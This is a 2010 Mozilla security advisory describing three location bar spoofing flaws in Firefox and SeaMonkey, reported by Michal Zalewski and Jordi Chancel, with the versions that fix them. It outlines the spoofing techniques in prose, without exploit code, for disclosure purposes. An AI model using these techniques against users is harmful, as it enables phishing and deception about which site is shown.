Mozilla Foundation Security Advisory 2010-45
Multiple location bar spoofing vulnerabilities
- Announced
- July 20, 2010
- Reporter
- Michal Zalewski, Jordi Chancel
- Impact
- Moderate
- Products
- Firefox, SeaMonkey
- Fixed in
- 
        - Firefox 3.5.11
- Firefox 3.6.7
- SeaMonkey 2.0.6
 
Description
Google security researcher Michal Zalewski
reported two methods for spoofing the contents of the location bar.
The first method works by opening a new window containing a resource
that responds with an HTTP 204 (no content) and then using the
reference to the new window to insert HTML content into the blank
document.  The second location bar spoofing method does not require that the
resource opened in a new window respond with 204, as long as the
opener calls window.stop() before the document is loaded.
In either case a user could be mislead as to the correct location of
the document they are currently viewing.
Security researcher Jordi Chancel reported that
the location bar could be spoofed to look like a secure page when the
current document was served via plaintext.  The vulnerability is
triggered by a server by first redirecting a request for a plaintext
resource to another resource behind a valid SSL/TLS certificate.  A
second request made to the original plaintext resource which is
responded to not with a redirect but with JavaScript
containing history.back()
and history.forward() will result in the plaintext
resource being displayed with valid SSL/TLS badging in the location
bar.